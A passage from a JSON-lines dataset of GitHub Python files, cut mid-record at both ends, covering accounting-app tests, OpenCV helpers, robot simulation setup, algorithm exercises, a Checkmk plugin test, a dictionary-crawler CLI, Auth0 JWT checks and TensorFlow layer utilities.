test_viewOther(self, _input, _hintGetStartDate, _hintGetEndDate, _stdout):\n with self.mock_db_config:\n ReadRecordPage.setUp_connection_and_table()\n ReadRecordPage.viewOther()\n ReadRecordPage.viewOther()\n ReadRecordPage.tearDown_connection(es.NONE)\n self.assertEqual(_hintGetStartDate.call_count, 3)\n self.assertEqual(_hintGetEndDate.call_count, 3)\n output_lines = _stdout.getvalue().strip().split('\\n')\n self.assertEqual(len(output_lines), 3)\n self.assertEqual(output_lines[0], \"1 EXPENSE 類別: 食物 金額: 50.0 帳戶: 現金 地點: 便利商店 消費時間: 2023-05-01 扣款時間: 2023-05-01 發票號碼: 12345678 備註: milk\")\n self.assertEqual(output_lines[1], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n self.assertEqual(output_lines[2], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n\n @patch.object(ReadRecordPage, \"execute\")\n @patch.object(ReadRecordPage, \"choose\",\n side_effect=[ReadRecordOption.TODAY, ReadRecordOption.WEEK, ReadRecordOption.MONTH, ReadRecordOption.OTHER, ReadRecordOption.BACK],\n )\n @patch.object(ReadRecordPage, \"show\")\n def test_start(self, _show, _choose, _execute):\n ReadRecordPage.start()\n self.assertEqual(_show.call_count, 5)\n self.assertEqual(_choose.call_count, 5)\n self.assertEqual(_execute.call_count, 4)","repo_name":"jason-ntu/accounting","sub_path":"readRecordTest.py","file_name":"readRecordTest.py","file_ext":"py","file_size_in_byte":7475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21713149518","text":"import cv2\nimport numpy as np\n##\n## OpenCV (cv2) useful functions\n##\n\n## ============================================================================\n## READ AND DISPLAY FILES\n## ============================================================================\ndef readImg(file):\n return cv2.imread(file, cv2.IMREAD_UNCHANGED)\n\ndef displayImg(img, rectangles = ()):\n img_ = img.copy()\n\n # Draw rectangles, (xmin, xmax, wmin, ymax)\n for rectangle in rectangles:\n cv2.rectangle(img_, (rectangle[0], rectangle[2]), (rectangle[1], rectangle[3]), (255, 0, 0), 2)\n\n cv2.imshow('image', img_)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n return\n\ndef getImgSize(img):\n # returns size as a tuple (width, height, channels)\n result = img.shape\n if len(result) == 3:\n return (result[1], result[0], result[2])\n else:\n return (result[1], result[0], 1)\n\ndef saveToFile(img, filename):\n cv2.imwrite(filename,img)\n\n## ============================================================================\n## IMAGE TRANSFORMATIONS\n## ============================================================================\ndef scaleImg(img, scale_factor):\n return cv2.resize(img, (0,0), fx = scale_factor, fy = scale_factor)\n\ndef resizeImg(img, W, H):\n size = getImgSize(img)\n w = size[0]\n h = size[1]\n Fx = W/w\n Fy = H/h\n return cv2.resize(img, (0,0), fx = Fx, fy = Fy)\n\ndef resizeCanvas(img, X, Y):\n M = np.float32([[1, 0, 0], [0, 1, 0]])\n return cv2.warpAffine(img, M, (X, Y))\n\ndef traslateImg(img, deltaX, deltaY):\n M = np.float32([[1, 0, deltaX], [0, 1, deltaY]])\n size = getImgSize(img)\n size = (size[0],size[1])\n return cv2.warpAffine(img, M, size)\n\ndef rotateImg(img, angle_deg):\n # Performs a counter-clockwise rotation\n\n size = getImgSize(img)\n width = size[0]\n height = size[1]\n\n angle_rad = angle_deg * np.pi / 180.0\n final_width = int(np.absolute(np.sin(angle_rad)) * height +\n np.absolute(np.cos(angle_rad) * width))\n final_height = int(np.absolute(np.cos(angle_rad)) * height +\n np.absolute(np.sin(angle_rad) * width))\n\n max_dimension = int(np.sqrt(width*width+height*height))+1\n\n ## 1. Increase the size of the canvas and move to the center\n img = resizeCanvas(img, max_dimension, max_dimension)\n img = traslateImg(img, int((max_dimension - width)/2), int((max_dimension - height)/2))\n\n ## 2. Rotate around the center\n M = cv2.getRotationMatrix2D(((max_dimension - 1) / 2.0, (max_dimension - 1) / 2.0), angle_deg, 1)\n img = cv2.warpAffine(img, M, (max_dimension, max_dimension))\n\n ## 3. Resize to the final dimension\n img = traslateImg(img, int((final_width - max_dimension) / 2.0), int((final_height - max_dimension) / 2.0))\n img = resizeCanvas(img, final_width, final_height)\n\n ##\n return img\n\ndef addAlphaChannel(img):\n if getImgSize(img)[2] != 3:\n return img\n\n b_channel, g_channel, r_channel = cv2.split(img)\n alpha_channel = np.ones(b_channel.shape, dtype=b_channel.dtype) * 50\n return cv2.merge((b_channel, g_channel, r_channel, alpha_channel))\n\ndef adjustGamma(image, gamma=1.0):\n invGamma = 1.0 / gamma\n table = np.array([((i / 255.0) ** invGamma) * 255\n for i in np.arange(0, 256)]).astype(\"uint8\")\n return cv2.LUT(image, table)\n\ndef placeImg(img_small, img_large, X, Y):\n # places a small image onto a large one at position (X,Y)\n\n size = getImgSize(img_small)\n width_small = size[0]\n height_small = size[1]\n size = getImgSize(img_large)\n width_large = size[0]\n height_large = size[1]\n\n img_small = resizeCanvas(img_small, width_large, height_large)\n img_small = traslateImg(img_small, X, Y)\n\n img_small_no_alpha = cv2.cvtColor(img_small, cv2.COLOR_BGR2GRAY)\n ret, mask = cv2.threshold(img_small_no_alpha, 10, 255, cv2.THRESH_BINARY)\n mask = cv2.bitwise_not(mask)\n\n img_large = cv2.bitwise_and(img_large, img_large, mask = mask)\n\n return cv2.add(addAlphaChannel(img_large), img_small)\n\n #l_img[y_offset:y_offset + s_img.shape[0], x_offset:x_offset + s_img.shape[1]] = s_img\n","repo_name":"frankovacevich/ObjectDetectionRepo","sub_path":"images/helperCV2.py","file_name":"helperCV2.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15305114984","text":"\"\"\"Interface between Bullet and the Dynamic Graph for solo12 \"\"\"\n\n\nfrom robot_properties_solo.solo8wrapper import Solo8Robot, Solo8Config\nfrom dg_blmc_robots.solo.dg_bullet_solo import DgBulletSoloBaseRobot\n\n\nclass QuadrupedBulletRobot(DgBulletSoloBaseRobot):\n def __init__(\n self,\n use_fixed_base=False,\n record_video=False,\n init_sliders_pose=4 * [0.5],\n ):\n\n super(QuadrupedBulletRobot, self).__init__(\n Solo8Robot,\n Solo8Config,\n use_fixed_base,\n record_video,\n init_sliders_pose,\n )\n\n self.q0[0] = 0.2\n self.q0[1] = 0.0\n self.q0[2] = 0.22\n self.q0[6] = 1.0\n self.q0[7] = 0.8\n self.q0[8] = -1.6\n self.q0[9] = 0.8\n self.q0[10] = -1.6\n self.q0[11] = -0.8\n self.q0[12] = 1.6\n self.q0[13] = -0.8\n self.q0[14] = 1.6\n\n # Sync the current robot state to the graph input signals.\n self._sim2signal()\n\n\ndef get_robot(\n use_fixed_base=False,\n record_video=False,\n init_sliders_pose=4 * [0.5],\n with_gui=True,\n):\n return QuadrupedBulletRobot(\n use_fixed_base, record_video, init_sliders_pose\n )\n\n\n# Alias to new solo8 name.\nSolo8BulletRobot = QuadrupedBulletRobot\nget_solo8_robot = get_robot\n","repo_name":"machines-in-motion/dg_blmc_robots","sub_path":"python/dg_blmc_robots/solo/solo8_bullet.py","file_name":"solo8_bullet.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"8712277471","text":"class queue:\r\n\r\n class Full(Exception):\r\n pass\r\n\r\n class Empty(Exception):\r\n pass\r\n\r\n def __init__(self):\r\n\r\n self.start = 0\r\n self.end = 0\r\n self.stk = []\r\n\r\n def push(self, x):\r\n self.stk.append(x)\r\n self.end += 1\r\n\r\n def pop(self):\r\n if self.empty():\r\n raise queue.Empty\r\n self.start += 1\r\n return self.stk[self.start - 1]\r\n\r\n def size(self):\r\n return self.end - self.start\r\n\r\n def empty(self) -> bool:\r\n return self.size() <= 0\r\n\r\n def front(self):\r\n if self.empty():\r\n raise queue.Empty\r\n return self.stk[self.start]\r\n\r\n def back(self):\r\n if self.empty():\r\n raise queue.Empty\r\n return self.stk[self.end - 1]\r\n\r\nimport sys\r\nn = int(sys.stdin.readline())\r\nfor i in range(n):\r\n count = 1\r\n q = queue()\r\n N, M = map(int,sys.stdin.readline().split())\r\n l = list(map(int,sys.stdin.readline().split()))\r\n answer = (l[M],M)\r\n for i in range(len(l)):\r\n q.push((l[i],i))\r\n l.sort()\r\n while True:\r\n if l[-1] == q.front()[0]:\r\n if q.front() == answer:\r\n print(count)\r\n break\r\n l.pop()\r\n q.pop()\r\n count += 1\r\n else:\r\n q.push(q.pop())\r\n","repo_name":"2022-rescue-macbook/rescue-macbook-py","sub_path":"code/42792211.py3","file_name":"42792211.py3","file_ext":"py3","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72219982357","text":"# Defines two classes, Point() and Triangle().\n# An object for the second class is created by passing named arguments,\n# point_1, point_2 and point_3, to its constructor.\n# Such an object can be modified by changing one point, two or three points\n# thanks to the method change_point_or_points().\n# At any stage, the object maintains correct values\n# for perimeter and area.\n#\n# Written by *** and Eric Martin for COMP9021\n\n\nfrom math import sqrt\n\n\nclass PointError(Exception):\n def __init__(self, message):\n self.message = message\n\n\nclass Point():\n def __init__(self, x = None, y = None):\n if x is None and y is None:\n self.x = 0\n self.y = 0\n elif x is None or y is None:\n raise PointError('Need two coordinates, point not created.')\n else:\n self.x = x\n self.y = y\n \n # Possibly define other methods\n\n\nclass TriangleError(Exception):\n def __init__(self, message):\n self.message = message\n\ndef line(x1,y1,x2,y2,x3,y3):\n if x1==x2==x3:\n return 0\n elif x1==x2 :\n if y1 == y2:\n return 0\n else:\n return 1\n elif x2==x3 :\n if y2 == y3:\n return 0\n else:\n return 1\n elif x1==x3 :\n if y1 == y3:\n return 0\n else:\n return 1 \n else:\n if not((y2-y1)/(x2-x1) == (y3-y2)/(x3-x2)):\n return 1\n else:\n return 0\n\nclass Triangle:\n def __init__(self, *, point_1, point_2, point_3):\n if line(point_1.x,point_1.y,point_2.x,point_2.y,point_3.x,point_3.y):\n self.point_1 = point_1\n self.point_2 = point_2\n self.point_3 = point_3\n Triangle.perimeter(self)\n Triangle.area(self)\n else:\n raise TriangleError('Incorrect input, triangle not created.')\n \n\n def perimeter(self) :\n \n self.L_1 = sqrt((self.point_1.x-self.point_2.x)**2+\\\n (self.point_1.y-self.point_2.y)**2)\n self.L_2 = sqrt((self.point_1.x-self.point_3.x)**2+\\\n (self.point_1.y-self.point_3.y)**2)\n self.L_3 = sqrt((self.point_2.x-self.point_3.x)**2+\\\n (self.point_2.y-self.point_3.y)**2)\n self.perimeter = self.L_1+self.L_2+self.L_3\n \n def area(self) :\n s = (self.L_1+self.L_2+self.L_3)/2\n S = sqrt(s*(s-self.L_1)*(s-self.L_2)*(s-self.L_3))\n self.area = S\n \n def change_point_or_points(self, *, point_1 = None,point_2 = None, point_3 = None):\n inter_1 = self.point_1\n inter_2 = self.point_2\n inter_3 = self.point_3\n if not(point_1 is None):\n inter_1 = point_1\n if not(point_2 is None):\n inter_2 = point_2\n if not(point_3 is None):\n inter_3 = point_3\n \n if not(line(inter_1.x,inter_1.y,inter_2.x,inter_2.y,inter_3.x,inter_3.y)):\n print('Incorrect input, triangle not modified.')\n elif line(inter_1.x,inter_1.y,inter_2.x,inter_2.y,inter_3.x,inter_3.y):\n self.point_1=inter_1\n self.point_2=inter_2\n self.point_3=inter_3\n Triangle.perimeter(self)\n Triangle.area(self)\n \n","repo_name":"Elijahlen/Python_quizzes","sub_path":"Quizzes/quiz_6/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"36674084857","text":"# -*- encoding: utf-8\n# pylint: disable=protected-access,redefined-outer-name\nimport os\nimport ast\nimport pytest # type: ignore[import]\nfrom testlib import import_module\n\n\n@pytest.fixture(scope=\"module\")\ndef mk_filestats():\n return import_module(\"agents/plugins/mk_filestats.py\")\n\n\ndef test_lazy_file(mk_filestats):\n lfile = mk_filestats.FileStat(\"no such file\")\n assert lfile.path == \"no such file\"\n assert lfile.size is None\n assert lfile.age is None\n assert lfile.stat_status == \"file vanished\"\n\n assert isinstance(ast.literal_eval(lfile.dumps()), dict)\n\n lfile = mk_filestats.FileStat(__file__) # this should exist...\n assert lfile.path == __file__\n assert lfile.size == os.stat(__file__).st_size\n assert lfile.stat_status == \"ok\"\n assert isinstance(lfile.age, int)\n assert isinstance(ast.literal_eval(lfile.dumps()), dict)\n\n\n@pytest.mark.parametrize(\"config\", [({}), ({\n \"input_unknown\": None\n}), ({\n \"input_one\": None,\n \"input_two\": None\n})])\ndef test_get_file_iterator_invalid(mk_filestats, config):\n with pytest.raises(ValueError):\n mk_filestats.get_file_iterator(config)\n\n\n@pytest.mark.parametrize(\"config,pat_list\", [\n ({\n \"input_patterns\": \"foo\"\n }, [\"foo\"]),\n ({\n \"input_patterns\": '\"foo bar\" gee*'\n }, [\"foo bar\", \"gee*\"]),\n])\ndef test_get_file_iterator_pattern(mk_filestats, config, pat_list):\n iter_obj = mk_filestats.get_file_iterator(config)\n assert isinstance(iter_obj, mk_filestats.PatternIterator)\n assert iter_obj._patterns == [os.path.abspath(p) for p in pat_list]\n\n\n@pytest.mark.parametrize(\"operator,values,results\", [\n ('>', (2000., 1024, \"1000\"), (True, False, False)),\n ('>=', (2000., 1024, \"1000\"), (True, True, False)),\n ('<', (2000., 1024, \"1000\"), (False, False, True)),\n ('<=', (2000., 1024, \"1000\"), (False, True, True)),\n ('==', (2000., 1024, \"1000\"), (False, True, False)),\n])\ndef test_numeric_filter(mk_filestats, operator, values, results):\n num_filter = mk_filestats.AbstractNumericFilter('%s1024' % operator)\n for value, result in zip(values, results):\n assert result == num_filter._matches_value(value)\n\n\n@pytest.mark.parametrize(\"invalid_arg\", ['<>1024', '1\", \"filter_age\": \"==0\", \"filter_regex\": \"foo\"}\n filters = mk_filestats.get_file_filters(config)\n assert len(filters) == 3\n assert isinstance(filters[0], mk_filestats.RegexFilter)\n assert isinstance(filters[1], mk_filestats.AbstractNumericFilter)\n assert isinstance(filters[2], mk_filestats.AbstractNumericFilter)\n\n\n@pytest.mark.parametrize(\"config\", [{}, {\"output\": \"/dev/null\"}])\ndef test_get_ouput_aggregator_invalid(mk_filestats, config):\n with pytest.raises(ValueError):\n mk_filestats.get_output_aggregator(config)\n\n\n@pytest.mark.parametrize(\"output_value\", [\"count_only\", \"file_stats\"])\ndef test_get_ouput_aggregator(mk_filestats, output_value):\n aggr = mk_filestats.get_output_aggregator({\"output\": output_value})\n assert aggr is getattr(mk_filestats, \"output_aggregator_%s\" % output_value)\n","repo_name":"maalleni/checkmk","sub_path":"tests/unit/agents/plugins/test_mk_filestats.py","file_name":"test_mk_filestats.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"7280043369","text":"import pandas as pd\nwith open(\"names.txt\", \"r\") as f:\n ans = f.read()\nx = 1\n\ny = 2\n# ans_ls = ans.replace(\"\\n\",\",\").replace(\"\\t\",\",\")\nval = ans.split(\"\\n\")\nnew = []\nfor a in val:\n if \"\\t\" in a or \"Buy\" == a:\n continue\n else:\n new.append(a)\nprint(new)\ndict_coins = {}\nfor i in range(len(new)):\n # print(i)\n # print(x)\n # print(y)\n if i == x:\n # print(new[x])\n # print(new[y])\n dict_coins[new[x]] = new[y]\n x += 3\n y += 3\nprint(dict_coins)\n\nname = dict_coins.keys()\ndf = pd.DataFrame({'col':name, 'symbol': dict_coins.values()})\ndf.to_csv(\"coin.csv\")","repo_name":"mcazim98/N-A_Fintech_CityHack2022","sub_path":"all_Coins.py","file_name":"all_Coins.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34730748332","text":"import sys\ninput = sys.stdin.readline\n\nn, m = list(map(int, input().split()))\ns = dict()\nt = dict()\n\nfor i in range(n):\n name = input().strip()\n s[i+1] = name\n t[name] = i+1\n\nfor i in range(m):\n q = input().strip()\n if q.isdigit():\n q = int(q)\n print(s[q])\n else:\n print(t[q])","repo_name":"ParkJeongseop/Algorithm","sub_path":"Python/1620.py","file_name":"1620.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14907866642","text":"# URL : https://www.acmicpc.net/problem/14501\nimport sys\n\nn = int(input())\narr = [] # 상담 리스트\ndp = [0 for _ in range(n + 2)] # DP 리스트\n\n# 상담 리스트 입력\nfor _ in range(n):\n arr.append(list(map(int, input().split())))\n\nfor i in range(1, n + 2):\n todayFinishJob = [1, 0]\n\n for j in range(len(arr)):\n # 당일에 끝나는 작업이 있다면 전일 실적과, 상담 시작일까지의 수입 + 상담료를 합한 것 중 큰 것 선택\n # 2일엔 1일 실적 VS 2일에 끝나는 작업의 (누적 수당 + 작업 수당)\n # 해당일에 끝나는 작업이 여러개일 수 있음. # 수당이 더 큰 작업으로 교체하는 조건 적용해야 함\n if (\n i == j + 1 + arr[j][0]\n and dp[i - todayFinishJob[0]] + todayFinishJob[1]\n < dp[i - arr[j][0]] + arr[j][1]\n ):\n todayFinishJob = arr[j]\n\n dp[i] = max(dp[i - 1], dp[i - todayFinishJob[0]] + todayFinishJob[1])\n\nprint(dp[len(dp) - 1])\n","repo_name":"sjnqkqh/python_algorithm","sub_path":"2022.06/06.15/14501_S3.py","file_name":"14501_S3.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"19529891721","text":"from typing import List, Optional, Dict\n\nfrom .base import BaseCamundaConnector\n\n\nclass ProcessConnector:\n\n def __init__(self, connector: BaseCamundaConnector):\n self.camunda = connector\n\n async def get_process_variables(self, process_id):\n process_variables = await self.camunda.get(f'/process-instance/{process_id}/variables')\n return self.camunda.unpack_variables(process_variables)\n\n async def get_variables_by_activity_instance_id(self, activity_instance_id: str) -> dict:\n body_params = {\"activityInstanceIdIn\": [activity_instance_id]}\n process_variable_descriptions = await self.camunda.post(f'/variable-instance', body_params=body_params)\n result = {description[\"name\"]: description[\"value\"] for description in process_variable_descriptions}\n return result\n","repo_name":"can1can/camunda_external_worker","sub_path":"source/connectors/camunda_connector/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73503393876","text":"import math\n\nWIN_WIDTH = 1920\nWIN_HEIGHT = 1280\n\nMAIN_WIN = (WIN_WIDTH, WIN_HEIGHT)\n\n# Robot characteristics definition block :\n\n# Length of each joint from base to end effector in cm\nROBOT_J1_LEN = 15\nROBOT_J2_LEN = 15\nROBOT_J3_LEN = 15\n\n\n# Maximum distance at which the arm can grab an object in cm\nROBOT_MAX_RANGE = 35\n\n# Angle between each joint and the joint that precedes it (consider vector (1; 0) as the the joint_0)\n# Angles should be expressed in radians (from 0 to π)\n# An angle of 0 rad represents two perfectly aligned joints, pointing in the same direction\nROBOT_J1_ANGLE = 3 * math.pi / 4\nROBOT_J2_ANGLE = math.pi / 2\nROBOT_J3_ANGLE = 2 * math.pi / 3\n\nROBOT_J1_MAX_ANGLE = (math.pi / 8, 7 * math.pi / 8)\nROBOT_J2_MAX_ANGLE = (math.pi / 8, 7 * math.pi / 8)\nROBOT_J3_MAX_ANGLE = (math.pi / 8, 7 * math.pi / 8)\n\n# Joints width\nROBOT_JOINT_WIDTH = 5\n\n# End of definition block\n\nJOINT_SCALE = WIN_WIDTH * 0.16 / ((ROBOT_J1_LEN + ROBOT_J2_LEN + ROBOT_J3_LEN) / 3)\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nGREEN = (0, 255, 0)\n","repo_name":"artiom-gesp/42_projects","sub_path":"Python_Projects/Robot_arm/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"72203342678","text":"from __future__ import print_function\nfrom argparse import RawTextHelpFormatter, ArgumentParser\nfrom argparse_type_check import bool_spelling_check, level_spelling_check\nfrom Model import Crawler\n\nparser = ArgumentParser(description = \"Naver Dictionary Crawler\", formatter_class = RawTextHelpFormatter)\n\nparser.add_argument('-b', '--browser', type = str, default = \"firefox\",\n help = \"\\nCrawling을 할 때 실행할 browser\\n\" +\n \"firefox 또는 chrome 선택 가능\\n\" +\n \"default : firefox\\n\\n\")\n\nparser.add_argument('-H', '--headless', type = bool_spelling_check, default = True,\n help = \"\\nBrowser를 headless mode로 실행\\n\" +\n \"default : True\\n\\n\")\n\nparser.add_argument('-w', '--words', nargs = '+', type = str, default = None,\n help = \"\\n수집할 영어 단어 - ex) -w \\\"i\\\" \\\"we\\\" \\\"car\\\"\\n\\n\")\n\nparser.add_argument('-F', '--file', type = str, default = None, \n help = \"\\n예문을 수집할 단어들이 저장된 파일. 예제는 ReadMe 참조\\n\" +\n \"arguments words와 file 모두 입력된 경우, file arguments만 사용\\n\\n\")\n\nparser.add_argument('-c', '--csv_file', type = str, default = None,\n help = \"\\n이미 존재하는 csv 파일에 data를 추가\\n\\n\")\n\nparser.add_argument('-d', '--db_file', type = str, default = None,\n help = \"\\n이미 존재하는 sqlite 파일에 data를 추가\\n\\n\")\n\nparser.add_argument('-u', '--user', type = bool_spelling_check, default = True,\n help = \"\\n이용자가 번역에 참여한 예문을 포함\\n\" +\n \"default : True\\n\\n\")\n\nparser.add_argument('-t', '--translator', type = bool_spelling_check, default = True,\n help = \"\\n네이버 파파고 번역기가 번역한 예문을 포함\\n\" +\n \"default : True\\n\\n\")\n\nparser.add_argument('-p', '--pages', nargs = '+', type = int, default = None,\n help = \"\\n한 레벨 당 저장할 최대 page 수\\n\" +\n \"숫자 2개를 입력할 시, 크롤링 범위를 나타냄\\n\" +\n \"ex) -p 100 (1 page에서 100 page까지 크롤링)\\n\" +\n \"ex) -p 25 70 (25 page에서 70 page까지 크롤링)\\n\"\n \"default : 1 page에서 100 page까지 크롤링\\n\\n\")\n\nparser.add_argument('-l', '--levels', nargs = '+', type = level_spelling_check, default = None,\n help = \"\\n한 단어 당 저장할 표현 수준 - ex) -l \\\"초급\\\", \\\"고급\\\"\\n\" + \n \"default : all(초급, 중급, 고급)\\n\\n\")\n\nparser.add_argument('-f', '--folder', type = str, default = None,\n help = \"\\n결과를 저장할 folder 위치\\n\" +\n \"default : 현재 위치\\n\\n\")\n\nparser.add_argument('-s', '--sleep', type = float, default = 1,\n help = \"\\n예문과 예문 사이에 휴식 시간 (단위 : 초)\\n\" +\n \"default : 1초\\n\\n\")\n\nparser.add_argument('-P', '--patience', type = float, default = 5,\n help = \"\\n어떤 event가 완전히 로딩될 때까지 기다릴 최대 시간(단위 : 초)\\n\" + \n \"default : 5초\\n\\n\")\n\nargs = parser.parse_args()\nkwargs = vars(args)\n\ncrawler = Crawler(**kwargs)\ncrawler.start_crawling()","repo_name":"leesc912/Crawler","sub_path":"Naver/Dictionary/Crawler.py","file_name":"Crawler.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12383258298","text":"import json\nfrom flask import request, _request_ctx_stack\nfrom functools import wraps\nfrom jose import jwt\nfrom urllib.request import urlopen\nimport os\n\nAUTH0_DOMAIN = os.environ['AUTH0_DOMAIN']\nALGORITHMS = os.environ['ALGORITHMS']\nAPI_AUDIENCE = os.environ['API_AUDIENCE']\n\n# AuthError Exception\n'''\nAuthError Exception\nA standardized way to communicate auth failure modes\n'''\n\n\nclass AuthError(Exception):\n def __init__(self, error, status_code):\n self.error = error\n self.status_code = status_code\n\n\n# Auth Header\n\ndef get_token_auth_header():\n # Get authorization headers\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError('Authorization header missing', 401)\n\n # Split headers\n try:\n parts = auth.split()\n except:\n raise AuthError('Malformed header', 401)\n\n # Error handling\n if parts[0].lower() != 'bearer':\n raise AuthError('Invalid header: must be of type \"Bearer\"', 401)\n elif len(parts) == 1:\n raise AuthError('Invalid header: authorization token missing', 401)\n elif len(parts) > 2:\n raise AuthError(\n 'Invalid header: authorization header must be bearer token', 401\n )\n else:\n # Return token part of header\n return parts[1]\n\n\ndef check_permissions(permission, payload):\n if 'permissions' not in payload:\n raise AuthError('Bad request: permissions not included', 400)\n elif permission not in payload['permissions']:\n raise AuthError('Forbidden', 403)\n else:\n return True\n\n\ndef verify_decode_jwt(token):\n\n jsonurl = urlopen(f'https://{AUTH0_DOMAIN}/.well-known/jwks.json')\n jwks = json.loads(jsonurl.read())\n unverified_header = jwt.get_unverified_header(token)\n rsa_key = {}\n\n if 'kid' not in unverified_header:\n raise AuthError('Malformed header', 401)\n\n for key in jwks['keys']:\n if key['kid'] == unverified_header['kid']:\n rsa_key = {\n 'kty': key['kty'],\n 'kid': key['kid'],\n 'use': key['use'],\n 'n': key['n'],\n 'e': key['e']\n }\n if rsa_key:\n try:\n payload = jwt.decode(\n token,\n rsa_key,\n algorithms=ALGORITHMS,\n audience=API_AUDIENCE,\n issuer='https://' + AUTH0_DOMAIN + '/'\n )\n\n return payload\n\n except jwt.ExpiredSignatureError:\n raise AuthError('Token expired', 401)\n\n except jwt.JWTClaimsError:\n raise AuthError(\n 'Incorrect claims. Please check the audience and issuer.', 401\n )\n\n except Exception:\n raise AuthError(\n 'Invalid header: unable to parse authentication token', 400\n )\n\n raise AuthError('Invalid header: unable to find the appropriate key', 400)\n\n\ndef requires_auth(permission=''):\n def requires_auth_decorator(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n token = get_token_auth_header()\n payload = verify_decode_jwt(token)\n check_permissions(permission, payload)\n return f(payload, *args, **kwargs)\n\n return wrapper\n return requires_auth_decorator\n","repo_name":"cameronb123/FSND-capstone","sub_path":"auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"13733627454","text":"import tensorflow as tf\nimport numpy as np\n\n\ndef get_weight(shape, variance_scale=2, scale_weight=False):\n stddev = np.sqrt(variance_scale / np.prod(shape[:-1]))\n if scale_weight:\n weight = tf.get_variable(\n name=\"weight\",\n shape=shape,\n initializer=tf.initializers.truncated_normal(0, 1)\n ) * stddev\n else:\n weight = tf.get_variable(\n name=\"weight\",\n shape=shape,\n initializer=tf.initializers.truncated_normal(0, stddev)\n )\n return weight\n\n\ndef get_bias(shape):\n bias = tf.get_variable(\n name=\"bias\",\n shape=shape,\n initializer=tf.initializers.zeros()\n )\n return bias\n\n\ndef dense(inputs, units, use_bias=True, variance_scale=2, scale_weight=False):\n weight = get_weight(\n shape=[inputs.shape[1].value, units],\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n inputs = tf.matmul(inputs, weight)\n if use_bias:\n bias = get_bias([inputs.shape[1].value])\n inputs = tf.nn.bias_add(inputs, bias)\n return inputs\n\n\ndef conv2d(inputs, filters, kernel_size, strides=[1, 1], use_bias=True,\n variance_scale=2, scale_weight=True):\n weight = get_weight(\n shape=[*kernel_size, inputs.shape[1].value, filters],\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n inputs = tf.nn.conv2d(\n input=inputs,\n filter=weight,\n strides=[1, 1] + strides,\n padding=\"SAME\",\n data_format=\"NCHW\"\n )\n if use_bias:\n bias = get_bias([inputs.shape[1].value])\n inputs = tf.nn.bias_add(inputs, bias, data_format=\"NCHW\")\n return inputs\n\n\ndef conv2d_transpose(inputs, filters, kernel_size, strides=[1, 1], use_bias=True,\n variance_scale=2, scale_weight=True):\n weight = get_weight(\n shape=[*kernel_size, inputs.shape[1].value, filters],\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n weight = tf.transpose(weight, [0, 1, 3, 2])\n input_shape = np.array(inputs.shape)\n output_shape = [tf.shape(inputs)[0], filters, *input_shape[2:] * strides]\n inputs = tf.nn.conv2d_transpose(\n value=inputs,\n filter=weight,\n output_shape=output_shape,\n strides=[1, 1] + strides,\n padding=\"SAME\",\n data_format=\"NCHW\"\n )\n if use_bias:\n bias = get_bias([inputs.shape[1].value])\n inputs = tf.nn.bias_add(inputs, bias, data_format=\"NCHW\")\n return inputs\n\n\ndef upscale2d(inputs, factors=[2, 2]):\n factors = np.asanyarray(factors)\n if (factors == 1).all():\n return inputs\n shape = inputs.shape\n inputs = tf.reshape(inputs, [-1, shape[1], shape[2], 1, shape[3], 1])\n inputs = tf.tile(inputs, [1, 1, 1, factors[0], 1, factors[1]])\n inputs = tf.reshape(inputs, [-1, shape[1], shape[2] * factors[0], shape[3] * factors[1]])\n return inputs\n\n\ndef downscale2d(inputs, factors=[2, 2]):\n # NOTE: requires tf_config[\"graph_options.place_pruned_graph\"] = True\n factors = np.asanyarray(factors)\n if (factors == 1).all():\n return inputs\n inputs = tf.nn.avg_pool(\n value=inputs,\n ksize=[1, 1, *factors],\n strides=[1, 1, *factors],\n padding=\"SAME\",\n data_format=\"NCHW\"\n )\n return inputs\n\n\ndef embedding(inputs, units, variance_scale=2, scale_weight=False):\n weight = get_weight(\n shape=[inputs.shape[1].value, units],\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n inputs = 